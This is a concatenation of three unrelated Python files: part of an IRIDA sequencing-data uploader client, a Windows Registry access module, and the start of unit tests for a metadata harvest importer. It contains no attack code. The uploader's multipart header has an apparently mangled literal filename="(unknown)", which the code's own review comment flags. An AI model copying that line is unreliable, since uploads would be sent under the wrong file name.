        "headers": {
            "Content-Type": "application/json"
        }
    }
    response = self.session.post(url, json_obj, **headers)
    if response.status_code != httplib.CREATED:  # expect 201
        raise ProjectError("Error: " +
                           str(response.status_code) + " " +
                           response.text)
    return json.loads(response.text)
def send_samples(self, samples_list):
    """
    post request to send sample(s) to the given project
    the project that the sample will be sent to is in its dictionary's
    "sampleProject" key
    arguments:
        samples_list -- list containing Sample object(s) to send
    returns a list containing dictionaries of the result of post request.
    """
    self.cached_samples = {}  # reset the cache, we're updating stuff
    self.cached_projects = None
    json_res_list = []
    for sample in samples_list:
        # Resolve the target project's samples collection; StopIteration
        # from get_link means no project matched the identifier.
        try:
            project_id = sample.get_project_id()
            proj_URL = self.get_link(self.base_URL, "projects")
            url = self.get_link(proj_URL, "project/samples",
                                targ_dict={
                                    "key": "identifier",
                                    "value": project_id
                                })
        except StopIteration:
            raise ProjectError("The given project ID: " +
                               project_id + " doesn't exist")
        headers = {
            "headers": {
                "Content-Type": "application/json"
            }
        }
        json_obj = json.dumps(sample, cls=Sample.JsonEncoder)
        response = self.session.post(url, json_obj, **headers)
        if response.status_code == httplib.CREATED:  # 201
            json_res = json.loads(response.text)
            json_res_list.append(json_res)
        else:
            # Surface the failure to the UI layer before raising so the
            # upload screen can show the server's error message.
            logging.error("Didn't create sample on server, response code is [{}] and error message is [{}]".format(response.status_code, response.text))
            e = SampleError("Error {status_code}: {err_msg}.\nSample data: {sample_data}".format(status_code=str(response.status_code), err_msg=response.text, sample_data=str(sample)), ["IRIDA rejected the sample."])
            send_message(sample.upload_failed_topic, exception = e)
            raise e
    return json_res_list
def get_file_size_list(self, samples_list):
    """
    Calculate the total file size for each sample's files.

    Also records the size on each sample (pair_files_byte_size) so
    progress reporting can use it later.

    arguments:
        samples_list -- list containing Sample object(s)

    returns a list with one byte count per sample, in input order.
    """
    sizes = []
    for sample in samples_list:
        sample_bytes = sample.get_files_size()
        sample.pair_files_byte_size = sample_bytes
        sizes.append(sample_bytes)
    return sizes
def send_sequence_files(self, samples_list, upload_id=1):
    """
    Send the sequence files found in each sample in samples_list.

    The files to be sent are in sample.get_files(); per-sample work is
    delegated to _send_sequence_files(), which actually talks to the
    API. This method keeps the overall progress bookkeeping.

    arguments:
        samples_list -- list containing Sample object(s)
        upload_id -- the run to send the files to

    returns a list containing dictionaries of the result of each post.
    """
    json_res_list = []
    file_size_list = self.get_file_size_list(samples_list)
    # Progress totals consumed while files stream up to the server.
    self.size_of_all_seq_files = sum(file_size_list)
    self.total_bytes_read = 0
    self.start_time = time()
    for sample in samples_list:
        try:
            json_res = self._send_sequence_files(sample, upload_id)
            json_res_list.append(json_res)
        except Exception as e:
            # `except Exception, e` is removed Python 3 syntax; `as`
            # works on Python 2.6+ as well.
            logging.error("The upload failed for unexpected reasons, informing the UI.")
            send_message(sample.upload_failed_topic, exception=e)
            raise
    return json_res_list
def _kill_connections(self):
    """Terminate any currently running uploads.
    This method simply sets a flag to instruct any in-progress generators called
    by `_send_sequence_files` below to stop generating data and raise an exception
    that will set the run to an error state on the server.
    """
    self._stop_upload = True
    # Closing the session also aborts any in-flight request.
    self.session.close()
def _send_sequence_files(self, sample, upload_id):
    """
    post request to send sequence files found in given sample argument
    raises error if either project ID or sample ID found in Sample object
    doesn't exist in irida
    arguments:
        sample -- Sample object
        upload_id -- the run to upload the files to
    returns result of post request.
    """
    json_res = {}
    self._stop_upload = False
    # Resolve the project's samples collection; StopIteration from
    # get_link means no project matched the identifier.
    try:
        project_id = sample.get_project_id()
        proj_URL = self.get_link(self.base_URL, "projects")
        samples_url = self.get_link(proj_URL, "project/samples",
                                    targ_dict={
                                        "key": "identifier",
                                        "value": project_id
                                    })
    except StopIteration:
        raise ProjectError("The given project ID: " + project_id + " doesn't exist")
    # Resolve the sample's sequenceFiles collection the same way.
    try:
        sample_id = sample.get_id()
        seq_url = self.get_link(samples_url, "sample/sequenceFiles",
                                targ_dict={
                                    "key": "sampleName",
                                    "value": sample_id
                                })
    except StopIteration:
        raise SampleError("The given sample ID: {} doesn't exist".format(sample_id),
                          ["No sample with name [{}] exists in project [{}]".format(sample_id, project_id)])
    # The multipart form-data body is streamed by hand (generators below)
    # so large FASTQ files are never held in memory all at once.
    boundary = "B0undary"
    read_size = 32768

    def _send_file(filename, parameter_name, bytes_read=0):
        """This function is a generator that yields a multipart form-data
        entry for the specified file. This function will yield `read_size`
        bytes of the specified file name at a time as the generator is called.
        This function will also terminate generating data when the field
        `self._stop_upload` is set.
        Args:
            filename: the file to read and yield in `read_size` chunks to
                the server.
            parameter_name: the form field name to send to the server.
            bytes_read: used for sending messages to the UI layer indicating
                the total number of bytes sent when sending the sample
                to the server.
        """
        # Send the boundary header section for the file
        # NOTE(review): the literal filename="(unknown)" below looks like a
        # mangled "{filename}" placeholder -- the filename= kwarg passed to
        # .format() is otherwise unused. Confirm against upstream source.
        logging.info("Sending the boundary header section for {}".format(filename))
        yield ("\r\n--{boundary}\r\n"
               "Content-Disposition: form-data; name=\"{parameter_name}\"; filename=\"(unknown)\"\r\n"
               "\r\n").format(boundary=boundary, parameter_name=parameter_name, filename=filename.replace("\\", "/"))
        # Send the contents of the file, read_size bytes at a time until
        # we've either read the entire file, or we've been instructed to
        # stop the upload by the UI
        logging.info("Starting to send the file {}".format(filename))
        with open(filename, "rb", read_size) as fastq_file:
            data = fastq_file.read(read_size)
            while data and not self._stop_upload:
                bytes_read += len(data)
                send_message(sample.upload_progress_topic, progress=bytes_read)
                yield data
                data = fastq_file.read(read_size)
        logging.info("Finished sending file {}".format(filename))
        if self._stop_upload:
            logging.info("Halting upload on user request.")

    def _send_parameters(parameter_name, parameters):
        """This function is a generator that yields a multipart form-data
        entry with additional file metadata.
        Args:
            parameter_name: the form field name to use to send to the server.
            parameters: a JSON encoded object with the metadata for the file.
        """
        logging.info("Going to send parameters for {}".format(parameter_name))
        yield ("\r\n--{boundary}\r\n"
               "Content-Disposition: form-data; name=\"{parameter_name}\"\r\n"
               "Content-Type: application/json\r\n\r\n"
               "{parameters}\r\n").format(boundary=boundary, parameter_name=parameter_name, parameters=parameters)

    def _finish_request():
        """This function is a generator that yields the terminal boundary
        entry for a multipart form-data upload."""
        yield "--{boundary}--".format(boundary=boundary)

    def _sample_upload_generator(sample):
        """This function accepts the sample and composes a series of generators
        that are used to send the file contents and metadata for the sample.
        Args:
            sample: the sample to send to the server
        """
        bytes_read = 0
        file_metadata = sample.get_sample_metadata()
        file_metadata["miseqRunId"] = str(upload_id)
        file_metadata_json = json.dumps(file_metadata)
        if sample.is_paired_end():
            # Compose a collection of generators to send both files of a paired-end
            # file set and the corresponding metadata
            return itertools.chain(
                _send_file(filename=sample.get_files()[0], parameter_name="file1"),
                _send_file(filename=sample.get_files()[1], parameter_name="file2", bytes_read=path.getsize(sample.get_files()[0])),
                _send_parameters(parameter_name="parameters1", parameters=file_metadata_json),
                _send_parameters(parameter_name="parameters2", parameters=file_metadata_json),
                _finish_request())
        else:
            # Compose a generator to send the single file from a single-end
            # file set and the corresponding metadata.
            return itertools.chain(
                _send_file(filename=sample.get_files()[0], parameter_name="file"),
                _send_parameters(parameter_name="parameters", parameters=file_metadata_json),
                _finish_request())

    # Paired-end uploads go to the dedicated pairs endpoint.
    if sample.is_paired_end():
        logging.info("sending paired-end file")
        url = self.get_link(seq_url, "sample/sequenceFiles/pairs")
    else:
        logging.info("sending single-end file")
        url = seq_url
    send_message(sample.upload_started_topic)
    logging.info("Sending files to [{}]".format(url))
    response = self.session.post(url, data=_sample_upload_generator(sample),
                                 headers={"Content-Type": "multipart/form-data; boundary={}".format(boundary)})
    if self._stop_upload:
        logging.info("Upload was halted on user request, raising exception so that server upload status is set to error state.")
        raise SequenceFileError("Upload halted on user request.", [])
    if response.status_code == httplib.CREATED:
        json_res = json.loads(response.text)
        logging.info("Finished uploading sequence files for sample [{}]".format(sample.get_id()))
        send_message(sample.upload_completed_topic, sample=sample)
    else:
        e = SequenceFileError("Error {status_code}: {err_msg}\n".format(
            status_code=str(response.status_code),
            err_msg=response.reason))
        logging.info("Got an error when uploading [{}]: [{}]".format(sample.get_id(), e))
        logging.info(response.text)
        send_message(sample.upload_failed_topic, exception=e)
        raise e
    return json_res
def create_seq_run(self, metadata_dict):
    """
    Create a sequencing run with uploadStatus "UPLOADING".

    NOTE: the contents of metadata_dict are changed inside this method
    (THIS IS TERRIBLE): uploadStatus is forced to "UPLOADING" and every
    key the API does not accept is removed. There are some parsed
    metadata keys from the SampleSheet.csv that are currently not
    accepted/used by the API so they are discarded.

    arguments:
        metadata_dict -- SequencingRun's metadata parsed from
                         a Samplesheet.csv file by
                         miseqParser.parse_metadata()

    returns result of post request; raises SampleSheetError when the
    server rejects the run.
    """
    json_res = {}
    seq_run_url = self.get_link(self.base_URL, "sequencingRuns")
    url = self.get_link(seq_run_url, "sequencingRun/miseq")
    headers = {
        "headers": {
            "Content-Type": "application/json"
        }
    }
    # Everything not in this list is discarded before posting.
    acceptable_properties = [
        "layoutType", "chemistry", "projectName",
        "experimentName", "application", "uploadStatus",
        "investigatorName", "createdDate", "assay", "description",
        "workflow", "readLengths"]
    metadata_dict["uploadStatus"] = "UPLOADING"
    # Iterate over a snapshot of the keys: deleting from a dict while
    # iterating its live key view is fragile and breaks on Python 3.
    for key in list(metadata_dict.keys()):
        if key not in acceptable_properties:
            del metadata_dict[key]
    json_obj = json.dumps(metadata_dict)
    response = self.session.post(url, json_obj, **headers)
    if response.status_code == httplib.CREATED:  # 201
        json_res = json.loads(response.text)
    else:
        raise SampleSheetError("Error: " +
                               str(response.status_code) + " " +
                               response.reason)
    return json_res
def get_seq_runs(self):
    """
    Get the list of paired-end SequencingRuns.

    /api/sequencingRuns returns all SequencingRuns, so each run's
    layoutType is checked and only those equal to "PAIRED_END" are kept.

    returns list of paired-end SequencingRun dictionaries
    """
    url = self.get_link(self.base_URL, "sequencingRuns")
    all_runs = self.session.get(url).json()["resource"]["resources"]
    return [run for run in all_runs if run["layoutType"] == "PAIRED_END"]
def set_seq_run_complete(self, identifier):
    """
    Mark the sequencing run identified by `identifier` as "COMPLETE".

    returns result of patch request
    """
    return self._set_seq_run_upload_status(identifier, "COMPLETE")
def set_seq_run_uploading(self, identifier):
    """
    Mark the sequencing run identified by `identifier` as "UPLOADING".

    returns result of patch request
    """
    return self._set_seq_run_upload_status(identifier, "UPLOADING")
def set_seq_run_error(self, identifier):
    """
    Mark the sequencing run identified by `identifier` as "ERROR".

    returns result of patch request
    """
    return self._set_seq_run_upload_status(identifier, "ERROR")
def _set_seq_run_upload_status(self, identifier, status):
    """
    PATCH a sequencing run's uploadStatus to the given status string.

    arguments:
        identifier -- the id of the sequencing run to be updated
        status -- the new uploadStatus value

    returns result of patch request; raises SampleSheetError on any
    non-200 response.
    """
    seq_run_url = self.get_link(self.base_URL, "sequencingRuns")
    url = self.get_link(seq_run_url, "self",
                        targ_dict={
                            "key": "identifier",
                            "value": identifier
                        })
    headers = {
        "headers": {
            "Content-Type": "application/json"
        }
    }
    json_obj = json.dumps({"uploadStatus": status})
    response = self.session.patch(url, json_obj, **headers)
    if response.status_code != httplib.OK:  # expect 200
        raise SampleSheetError("Error: " +
                               str(response.status_code) + " " +
                               response.reason)
    return json.loads(response.text)
| |
'''Module for accessing MWR.
This module provides an advanced, easy-to-use API for
accessing and mutating the Microsoft Windows Registry.'''
################################################################################
__version__ = '$Revision: 0 $'
__date__ = 'March 19, 2007'
__author__ = 'Stephen "Zero" Chappell <my.bios@gmail.com>'
__credits__ = '''\
S. Schaub, for introducing me to programming.
B. Gates, for creating the Windows Registry.
F. Drake, for enforcing good Python documentation.'''
################################################################################
import _winreg
import sys as _sys
import time as _time
################################################################################
class HKEY:
    'Hive Constants'
    # Predefined registry hive handles, expressed as signed 32-bit
    # integers (e.g. CLASSES_ROOT is 0x80000000 as an unsigned DWORD).
    CLASSES_ROOT = -2147483648
    CURRENT_USER = -2147483647
    LOCAL_MACHINE = -2147483646
    USERS = -2147483645
    CURRENT_CONFIG = -2147483643
class KEY:
    'Mode Constants'
    # Access-rights bit flags for opening keys; the values below the
    # single bits are pre-OR'd composite masks (note READ == EXECUTE).
    QUERY_VALUE = 1
    SET_VALUE = 2
    CREATE_SUB_KEY = 4
    ENUMERATE_SUB_KEYS = 8
    NOTIFY = 16
    CREATE_LINK = 32
    WRITE = 131078
    EXECUTE = 131097
    READ = 131097
    ALL_ACCESS = 983103
class REG:
    'Type Constants'
    # Registry value data-type codes; each index matches the position of
    # the corresponding REG_* wrapper class in Values.TYPES below.
    NONE = 0
    SZ = 1
    EXPAND_SZ = 2
    BINARY = 3
    DWORD = 4
    DWORD_BIG_ENDIAN = 5
    LINK = 6
    MULTI_SZ = 7
    RESOURCE_LIST = 8
    FULL_RESOURCE_DESCRIPTOR = 9
    RESOURCE_REQUIREMENTS_LIST = 10
    QWORD = 11
################################################################################
class _Value(object):
    '_Value(value) -> _Value'

    def __init__(self, value):
        'Initialize the _Value object.'
        # The repr string is precomputed so subclasses automatically show
        # their own class name.
        self.__value = value
        self.__repr = '%s(%r)' % (self.__class__.__name__, value)

    def __repr__(self):
        'Return the object\'s representation.'
        return self.__repr

    @property
    def value(self):
        'Value of this object.'
        return self.__value
# One concrete _Value subclass per registry data type; the class name
# records which REG.* type code a value was read with (see Values.TYPES).
class REG_NONE(_Value): pass
class REG_SZ(_Value): pass
class REG_EXPAND_SZ(_Value): pass
class REG_BINARY(_Value): pass
class REG_DWORD(_Value): pass
class REG_DWORD_BIG_ENDIAN(_Value): pass
class REG_LINK(_Value): pass
class REG_MULTI_SZ(_Value): pass
class REG_RESOURCE_LIST(_Value): pass
class REG_FULL_RESOURCE_DESCRIPTOR(_Value): pass
class REG_RESOURCE_REQUIREMENTS_LIST(_Value): pass
class REG_QWORD(_Value): pass
################################################################################
class Registry(object):
    'Registry([computer]) -> Registry'
    def __init__(self, computer=None):
        'Initialize the Registry object.'
        # `computer` is a remote machine name (or None for the local
        # registry); it is forwarded to every Key this object creates.
        self.__computer = computer
        self.__repr = 'Registry()' if computer is None else 'Registry(%r)' % computer
    def __repr__(self):
        'Return the object\'s representation.'
        return self.__repr
    def __iter__(self):
        'Iterate over hives defined in HKEY.'
        # Every ALL-CAPS attribute of HKEY is treated as a hive constant.
        return (Key(key, computer=self.__computer) for key in map(HKEY.__dict__.__getitem__, filter(str.isupper, dir(HKEY))))
    def __HKEY_CLASSES_ROOT(self):
        'Private class method.'
        return Key(HKEY.CLASSES_ROOT, computer=self.__computer)
    def __HKEY_CURRENT_USER(self):
        'Private class method.'
        return Key(HKEY.CURRENT_USER, computer=self.__computer)
    def __HKEY_LOCAL_MACHINE(self):
        'Private class method.'
        return Key(HKEY.LOCAL_MACHINE, computer=self.__computer)
    def __HKEY_USERS(self):
        'Private class method.'
        return Key(HKEY.USERS, computer=self.__computer)
    def __HKEY_CURRENT_CONFIG(self):
        'Private class method.'
        return Key(HKEY.CURRENT_CONFIG, computer=self.__computer)
    # Each property opens a fresh Key for its hive on every access.
    HKEY_CLASSES_ROOT = property(__HKEY_CLASSES_ROOT, doc='The CLASSES_ROOT hive.')
    HKEY_CURRENT_USER = property(__HKEY_CURRENT_USER, doc='The CURRENT_USER hive.')
    HKEY_LOCAL_MACHINE = property(__HKEY_LOCAL_MACHINE, doc='The LOCAL_MACHINE hive.')
    HKEY_USERS = property(__HKEY_USERS, doc='The USERS hive.')
    HKEY_CURRENT_CONFIG = property(__HKEY_CURRENT_CONFIG, doc='The CURRENT_CONFIG hive.')
################################################################################
class Key(object):
    '''Key(key[, subkey][, mode][, computer]) -> Key
    Key(key) -> Key
    Key(key, subkey) -> Key
    Key(key, mode=value) -> Key
    Key(key, subkey, mode) -> Key
    Key(key, computer=value) -> Key
    Key(key, subkey, computer=value) -> Key
    Key(key, mode=value, computer=value) -> Key
    Key(key, subkey, mode, computer) -> Key'''
    def __init__(self, key, subkey=None, mode=None, computer=None):
        'Initialize the Key object.'
        # Dispatch on the exact combination of argument types: `key` may
        # be a raw hive constant / HKEYType handle or another Key, and
        # giving `computer` routes through ConnectRegistry for remote
        # access. Any unsupported combination raises TypeError.
        if isinstance(key, (int, _winreg.HKEYType)) and subkey is None and mode is None and computer is None:
            self.__key = _winreg.OpenKey(key, '')
        elif isinstance(key, Key) and subkey is None and mode is None and computer is None:
            self.__key = _winreg.OpenKey(key.__key, '')
        elif isinstance(key, (int, _winreg.HKEYType)) and isinstance(subkey, str) and mode is None and computer is None:
            self.__key = _winreg.OpenKey(key, subkey)
        elif isinstance(key, Key) and isinstance(subkey, str) and mode is None and computer is None:
            self.__key = _winreg.OpenKey(key.__key, subkey)
        elif isinstance(key, (int, _winreg.HKEYType)) and subkey is None and isinstance(mode, int) and computer is None:
            self.__key = _winreg.OpenKey(key, '', 0, mode)
        elif isinstance(key, Key) and subkey is None and isinstance(mode, int) and computer is None:
            self.__key = _winreg.OpenKey(key.__key, '', 0, mode)
        elif isinstance(key, (int, _winreg.HKEYType)) and isinstance(subkey, str) and isinstance(mode, int) and computer is None:
            self.__key = _winreg.OpenKey(key, subkey, 0, mode)
        elif isinstance(key, Key) and isinstance(subkey, str) and isinstance(mode, int) and computer is None:
            self.__key = _winreg.OpenKey(key.__key, subkey, 0, mode)
        elif isinstance(key, int) and subkey is None and mode is None and isinstance(computer, str):
            self.__key = _winreg.ConnectRegistry(computer, key)
        elif isinstance(key, int) and isinstance(subkey, str) and mode is None and isinstance(computer, str):
            self.__key = _winreg.OpenKey(_winreg.ConnectRegistry(computer, key), subkey)
        elif isinstance(key, int) and subkey is None and isinstance(mode, int) and isinstance(computer, str):
            self.__key = _winreg.OpenKey(_winreg.ConnectRegistry(computer, key), '', 0, mode)
        elif isinstance(key, int) and isinstance(subkey, str) and isinstance(mode, int) and isinstance(computer, str):
            self.__key = _winreg.OpenKey(_winreg.ConnectRegistry(computer, key), subkey, 0, mode)
        else:
            raise TypeError, 'Please check documentation.'
        # Live container views over this key's subkeys and named values.
        self.__keys = Keys(self.__key)
        self.__values = Values(self.__key)
        self.__repr = 'Key(%s)' % ', '.join([repr(key)] + ['%s=%r' % (key, value) for key, value in zip(('subkey', 'mode', 'computer'), (subkey, mode, computer)) if value is not None])
    def __repr__(self):
        'Return the object\'s representation.'
        return self.__repr
    def save(self, file_name):
        'Save this key to file.'
        _winreg.SaveKey(self.__key, file_name)
    def load(self, subkey, file_name):
        'Load subkey from file.'
        _winreg.LoadKey(self.__key, subkey, file_name)
    def __get_keys(self):
        'Private class method.'
        return self.__keys
    def __set_keys(self, keys):
        'Private class method.'
        # Assigning a string (or sequence of strings) to `keys` creates
        # the named subkey(s) rather than replacing the Keys view.
        if isinstance(keys, str):
            _winreg.CreateKey(self.__key, keys)
        elif isinstance(keys, (list, tuple)):
            for key in keys:
                self.keys = key
        else:
            raise TypeError, 'Key Could Not Be Created'
    def __del_keys(self):
        'Private class method.'
        # Delete subkeys one at a time until EnumKey runs out and raises.
        try:
            while True:
                _winreg.DeleteKey(self.__key, _winreg.EnumKey(self.__key, 0))
        except EnvironmentError:
            pass
    def __get_values(self):
        'Private class method.'
        return self.__values
    def __set_values(self, values):
        'Private class method.'
        # Assigning a name creates that value, initialized from this
        # key's default value as a REG_SZ string.
        if isinstance(values, str):
            _winreg.SetValueEx(self.__key, values, 0, REG.SZ, _winreg.QueryValue(self.__key, ''))
        elif isinstance(values, (list, tuple)):
            for value in values:
                self.values = value
        else:
            raise TypeError, 'Value Could Not Be Created'
    def __del_values(self):
        'Private class method.'
        # Delete values one at a time until EnumValue runs out and raises.
        try:
            while True:
                _winreg.DeleteValue(self.__key, _winreg.EnumValue(self.__key, 0)[0])
        except EnvironmentError:
            pass
    def __get_value(self):
        'Private class method.'
        return _winreg.QueryValue(self.__key, '')
    def __set_value(self, value):
        'Private class method.'
        _winreg.SetValue(self.__key, '', REG.SZ, value)
    def __del_value(self):
        'Private class method.'
        _winreg.DeleteValue(self.__key, '')
    def __get_info(self):
        'Private class method.'
        return Info(*_winreg.QueryInfoKey(self.__key))
    keys = property(__get_keys, __set_keys, __del_keys, 'Keys of this key.')
    values = property(__get_values, __set_values, __del_values, 'Values of this key.')
    value = property(__get_value, __set_value, __del_value, 'Value of this key.')
    info = property(__get_info, doc='Information about this key.')
################################################################################
class Keys(object):
    'Keys(key) -> Keys'
    # Dict-like live view over the subkeys of an open registry key.
    def __init__(self, key):
        'Initialize the Keys object.'
        self.__key = key
        self.__repr = 'Keys(%r)' % key
    def __repr__(self):
        'Return the object\'s representation.'
        return self.__repr
    def __len__(self):
        'Return the number of keys.'
        # QueryInfoKey -> (num_subkeys, num_values, last_modified)
        return _winreg.QueryInfoKey(self.__key)[0]
    def __getitem__(self, key):
        'Return the specified key.'
        return Key(self.__key, key)
    def __setitem__(self, key, value):
        'Assign the item to a key.'
        # Recursively copy another Key's values and subkeys under `key`.
        key = Key(_winreg.CreateKey(self.__key, key), mode=KEY.ALL_ACCESS)
        for name in value.values:
            key.values[name] = value.values[name]
        for name in value.keys:
            key.keys[name] = value.keys[name]
    def __delitem__(self, key):
        'Delete the specified key.'
        _winreg.DeleteKey(self.__key, key)
    def __iter__(self):
        'Iterate over the key names.'
        # Snapshot the names into a tuple first so mutation during
        # iteration cannot skip entries.
        return iter(tuple(_winreg.EnumKey(self.__key, index) for index in xrange(_winreg.QueryInfoKey(self.__key)[0])))
    def __contains__(self, item):
        'Check for a key\'s existence.'
        # Registry key names are compared case-insensitively.
        item = item.lower()
        for index in xrange(_winreg.QueryInfoKey(self.__key)[0]):
            if _winreg.EnumKey(self.__key, index).lower() == item:
                return True
        return False
################################################################################
class Values(object):
    'Values(key) -> Values'
    # TYPES maps a REG type code (index) to its wrapper class above.
    TYPES = REG_NONE, REG_SZ, REG_EXPAND_SZ, REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_RESOURCE_LIST, REG_FULL_RESOURCE_DESCRIPTOR, REG_RESOURCE_REQUIREMENTS_LIST, REG_QWORD
    def __init__(self, key):
        'Initialize the Values object.'
        self.__key = key
        self.__repr = 'Values(%r)' % key
    def __repr__(self):
        'Return the object\'s representation.'
        return self.__repr
    def __len__(self):
        'Return the number of values.'
        # QueryInfoKey -> (num_subkeys, num_values, last_modified)
        return _winreg.QueryInfoKey(self.__key)[1]
    def __getitem__(self, key):
        'Return the specified value.'
        # Wrap the raw data in the class matching its registry type code.
        item_value, item_type = _winreg.QueryValueEx(self.__key, key)
        return self.TYPES[item_type](item_value)
    def __setitem__(self, key, value):
        'Assign the item to a value.'
        # A typed wrapper carries its own REG type; raw data reuses the
        # value's existing type (so the value must already exist).
        if isinstance(value, self.TYPES):
            _winreg.SetValueEx(self.__key, key, 0, list(self.TYPES).index(value.__class__), value.value)
        else:
            _winreg.SetValueEx(self.__key, key, 0, _winreg.QueryValueEx(self.__key, key)[1], value)
    def __delitem__(self, key):
        'Delete the specified value.'
        _winreg.DeleteValue(self.__key, key)
    def __iter__(self):
        'Iterate over the value names.'
        # Snapshot the names into a tuple first so mutation during
        # iteration cannot skip entries.
        return iter(tuple(_winreg.EnumValue(self.__key, index)[0] for index in xrange(_winreg.QueryInfoKey(self.__key)[1])))
    def __contains__(self, item):
        'Check for a value\'s existence.'
        # Registry value names are compared case-insensitively.
        item = item.lower()
        for index in xrange(_winreg.QueryInfoKey(self.__key)[1]):
            if _winreg.EnumValue(self.__key, index)[0].lower() == item:
                return True
        return False
################################################################################
class Info(object):
    'Info(keys, values, modified) -> Info'
    def __init__(self, keys, values, modified):
        'Store the key/value counts and the raw last-modified timestamp.'
        self.__keys = keys
        self.__values = values
        self.__modified = modified
        self.__repr = 'Info(%r, %r, %r)' % (keys, values, modified)
    def __repr__(self):
        'Return the representation built at construction time.'
        return self.__repr
    def __read_keys(self):
        'Private class method.'
        return self.__keys
    def __read_values(self):
        'Private class method.'
        return self.__values
    def __read_modified(self):
        'Private class method.'
        return self.__modified
    def __read_difference(self):
        'Private class method.'
        # Converts the stored 100ns-unit timestamp to seconds and compares it
        # with the current time; 11644473600 is presumably the offset between
        # the Windows FILETIME epoch (1601) and the Unix epoch (1970).
        return _time.time() + 11644473600.0 - self.__modified / 10000000.0
    keys = property(__read_keys, doc='Number of keys.')
    values = property(__read_values, doc='Number of values.')
    modified = property(__read_modified, doc='Time last modified.')
    difference = property(__read_difference, doc='Seconds since modified.')
################################################################################
if __name__ == '__main__':
    # CGI entry point: emit a plain-text header and echo this script's own
    # source code (uses the Python 2 `file` builtin; `open` in Python 3).
    _sys.stdout.write('Content-Type: text/plain\n\n')
    _sys.stdout.write(file(_sys.argv[0]).read())
| |
import unittest
from datetime import datetime
import logging
import mock
from ..util import LogCapture
from ...exception import HarvestError
from ...importer import harvest
def make_item(identifier):
    """Return a mock harvest item carrying the given OAI identifier."""
    mock_item = mock.Mock()
    mock_item.identifier = identifier
    return mock_item
def make_format(prefix):
    """Return a mock metadata format carrying the given prefix."""
    mock_format = mock.Mock()
    mock_format.prefix = prefix
    return mock_format
class TestUpdateFormats(unittest.TestCase):
    """Tests for harvest.update_formats.

    Python 2 idioms (assertItemsEqual, dict.iteritems, exception.message)
    are used throughout to stay consistent with the test suite.
    """
    def test_successful_update(self):
        """New formats are upserted, stale ones deleted, and changes committed."""
        formats = {
            'oai_dc': (
                'http://www.openarchives.org/OAI/2.0/oai_dc/',
                u'http://www.openarchives.org/OAI/2.0/oai_dc.xsd',
            ),
            u'ddi': (
                'http://www.icpsr.umich.edu/DDI/Version2-0',
                'http://www.icpsr.umich.edu/DDI/Version2-0.dtd',
            ),
        }
        oai_dc_mock = make_format(u'oai_dc')
        ead_mock = make_format(u'ead')
        provider = mock.Mock()
        provider.formats.return_value = formats
        with LogCapture(harvest) as log:
            with mock.patch.object(harvest, 'models') as models:
                models.Format.list.return_value = [oai_dc_mock, ead_mock]
                new_prefixes = harvest.update_formats(provider, purge=True)
        self.assertItemsEqual(new_prefixes, formats.keys())
        # 'oai_dc' is still provided, so it must survive; 'ead' is gone.
        self.assertEqual(oai_dc_mock.mark_as_deleted.mock_calls, [])
        ead_mock.mark_as_deleted.assert_called_once_with()
        models.Format.list.assert_called_once_with(ignore_deleted=True)
        self.assertItemsEqual(
            models.Format.create_or_update.mock_calls,
            [mock.call(p, n, s) for p, (n, s) in formats.iteritems()]
        )
        models.purge_deleted.assert_called_once_with()
        provider.formats.assert_called_once_with()
        models.commit.assert_called_once_with()
        log.assert_emitted('Removed 1 format and added 1 format.')
    def test_no_formats(self):
        """A provider with no formats raises HarvestError."""
        provider = mock.Mock()
        provider.formats.return_value = {}
        with self.assertRaises(HarvestError) as cm:
            harvest.update_formats(provider)
        self.assertIn('no formats', cm.exception.message)
    def test_provider_fails(self):
        """A provider failure is wrapped in HarvestError and logged."""
        provider = mock.Mock()
        provider.formats.side_effect = ImportError('some message')
        with LogCapture(harvest) as log:
            with self.assertRaises(HarvestError) as cm:
                harvest.update_formats(provider)
        self.assertIn('some message', cm.exception.message)
        log.assert_emitted('Failed to update metadata formats')
    def test_invalid_format(self):
        """A format entry that is not a (namespace, schema) pair is rejected."""
        provider = mock.Mock()
        provider.formats.return_value = {'prefix': 'invalid'}
        self.assertRaises(HarvestError, harvest.update_formats, provider)
    def test_dry_run(self):
        """A dry run logs the would-be changes without touching the models."""
        provider = mock.Mock()
        provider.formats.return_value = {'oai_dc': ('namespace', 'schema')}
        with LogCapture(harvest) as log:
            with mock.patch.object(harvest, 'models') as models:
                models.Format.list.return_value = []
                harvest.update_formats(provider, purge=True, dry_run=True)
        self.assertEqual(models.Format.create_or_update.mock_calls, [])
        self.assertEqual(models.purge_deleted.mock_calls, [])
        self.assertEqual(models.commit.mock_calls, [])
        log.assert_emitted('Removed 0 formats and added 1 format.')
class TestUpdateItems(unittest.TestCase):
    """Tests for harvest.update_items."""
    def test_successful_update(self):
        """Provider identifiers are upserted; items no longer listed are deleted."""
        identifiers = ['asd', u'U', 'a:b']
        provider = mock.Mock()
        provider.identifiers.return_value = identifiers
        item_mocks = [make_item(u'1234'), make_item(u'asd')]
        with LogCapture(harvest) as log:
            with mock.patch.object(harvest, 'models') as models:
                models.Item.list.return_value = item_mocks
                new_ids = harvest.update_items(provider, purge=True)
        self.assertItemsEqual(new_ids, identifiers)
        provider.identifiers.assert_called_once_with()
        # u'1234' is no longer provided and must be deleted; u'asd' is kept.
        item_mocks[0].mark_as_deleted.assert_called_once_with()
        self.assertEqual(item_mocks[1].mark_as_deleted.mock_calls, [])
        self.assertItemsEqual(
            models.Item.create_or_update.mock_calls,
            [mock.call(i) for i in ['asd', u'U', 'a:b']]
        )
        models.purge_deleted.assert_called_once_with()
        models.commit.assert_called_once_with()
        log.assert_emitted('Removed 1 item and added 2 items.')
    def test_no_identifiers(self):
        """When the provider returns nothing, all existing items are deleted."""
        provider = mock.Mock()
        provider.identifiers.return_value = []
        item_mock = make_item(u'id')
        with mock.patch.object(harvest, 'models') as models:
            models.Item.list.return_value = [item_mock]
            harvest.update_items(provider, purge=False)
        item_mock.mark_as_deleted.assert_called_once_with()
    def test_provider_fails(self):
        """A provider failure is wrapped in HarvestError."""
        provider = mock.Mock()
        provider.identifiers.side_effect = ValueError('abcabc')
        with self.assertRaises(HarvestError) as cm:
            harvest.update_items(provider)
        self.assertIn('abcabc', cm.exception.message)
    def test_duplicate_identifiers(self):
        """Duplicate identifiers collapse into a single upsert each."""
        provider = mock.Mock()
        provider.identifiers.return_value = [
            'i2', 'i1', 'i3', 'i1', 'i1', 'i2',
        ]
        with mock.patch.object(harvest, 'models') as models:
            models.Item.list.return_value = []
            new_ids = harvest.update_items(provider, purge=False)
        self.assertItemsEqual(
            models.Item.create_or_update.mock_calls,
